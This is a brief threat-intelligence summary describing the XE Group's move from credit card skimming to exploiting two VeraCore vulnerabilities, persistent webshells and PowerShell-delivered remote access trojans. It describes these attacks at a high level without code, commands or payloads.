From Credit Card Skimming to Exploiting Zero-Days
Essential information
- Published
- 03/02/2025 20:13
- Modified
- 04/02/2025 07:21
- Tags
- 2025-02-03 CVE-2024-57968 CVE-2025-25181 aspxspy information theft meterpreter persistent access powershell remote access trojan sql injection supply chain attack webshell zero-day
- Related entities
- 4 vulnerabilities (cve), 17 observables, 1 intrusion sets (apt), 17 techniques (mitre), 3 malware, 2 others
Description
XE Group, a cybercriminal organization active since 2013, has evolved from credit card skimming to exploiting zero-day vulnerabilities. The group initially focused on web vulnerabilities and supply chain attacks but has now shifted to targeted information theft in manufacturing and distribution sectors. They have demonstrated increased sophistication by exploiting previously undocumented vulnerabilities in VeraCore software, including an SQL injection flaw and an upload validation vulnerability. XE Group maintains long-term access to compromised systems, as evidenced by their reactivation of a webshell planted years earlier. Their recent activities involve exfiltrating config files, network reconnaissance, and deploying a Remote Access Trojan using obfuscated PowerShell commands. The group's evolution highlights their adaptability and growing threat to supply chain security.